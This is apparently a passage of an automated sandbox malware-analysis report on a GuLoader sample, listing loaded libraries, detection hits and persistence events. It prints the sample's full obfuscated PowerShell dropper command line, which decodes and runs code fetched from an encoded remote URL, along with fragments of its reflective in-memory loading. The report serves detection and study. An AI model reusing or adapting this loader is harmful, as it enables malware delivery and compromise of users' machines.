              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2322880413.0000000007BEE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000003.00000002.2329009699.00000000089B9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdba source: powershell.exe, 00000003.00000002.2329009699.00000000089B9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbM source: powershell.exe, 00000003.00000002.2329009699.00000000089B9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbH source: powershell.exe, 00000003.00000002.2329009699.00000000089B9000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000008.00000002.2289212925.00000000057AA000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2331073909.000000000B79A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2330820054.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1880233584.000001F8A8C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Outdrank)$global:Stregkodes = [System.Text.Encoding]::ASCII.GetString($Videobaandoptageren177)$global:Carbonatisation=$Stregkodes.substring($Dralonens,$Haltereddijassociationens)<#Ak
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Lrere $Volapyk $Tabelsatsens), (Angrebsstyrkens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Plumpness = [AppDomain]::CurrentDomain.GetAssemblies()$glob
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fabriksfremstillendes)), $Scholium).DefineDynamicModule($Kokkenes, $false).DefineType($Snirklerne, $Skattepligters, [System.MulticastD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Outdrank)$global:Stregkodes = [System.Text.Encoding]::ASCII.GetString($Videobaandoptageren177)$global:Carbonatisation=$Stregkodes.substring($Dralonens,$Haltereddijassociationens)<#Ak
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Su
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Su
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2SuJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7252CA pushad ; iretd 1_2_00007FFD9B7252C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7251A5 pushad ; iretd 1_2_00007FFD9B7252C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7200AD pushad ; iretd 1_2_00007FFD9B7200C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7FAA7E pushad ; ret 1_2_00007FFD9B7FAA99
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04F1326B push cs; iretd 3_2_04F1326F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04F1B26F push edi; retn 006Dh3_2_04F1B273
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_098549B1 push cs; retf 3_2_098549B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_098538BF pushad ; retf 3_2_098538CA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_09851DAC push ds; iretd 3_2_09851DAF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_09851D29 pushfd ; ret 3_2_09851D2A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_09854D4F push es; ret 3_2_09854D50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_098521D7 push cs; retf 3_2_098521DD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_098520CB push es; retf 3_2_098520D4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_098523EE push 0000005Eh; ret 3_2_098523F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0985228C pushfd ; retf 3_2_0985229B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0985229D push edx; retf 3_2_0985229E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_098545AA push ebp; ret 3_2_0985460A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_098545CD push ebp; ret 3_2_0985460A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0985444B push es; iretd 3_2_0985444C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_098556F0 push esi; ret 3_2_09855714
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03861DAC push ds; iretd 8_2_03861DAF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_038645AA push ebp; ret 8_2_0386460A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_038649B1 push cs; retf 8_2_038649B2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_038645CD push ebp; ret 8_2_0386460A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_038621D7 push cs; retf 8_2_038621DD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_038623EE push 0000005Eh; ret 8_2_038623F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03861D29 pushfd ; ret 8_2_03861D2A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03864D4F push es; ret 8_2_03864D50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0386228C pushfd ; retf 8_2_0386229B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0386229D push edx; retf 8_2_0386229E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_038638BF pushad ; retf 8_2_038638CA

              Persistence and Installation Behavior

              barindex
              Sample is not signed and drops a device driver
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Margenindstilling.SysJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
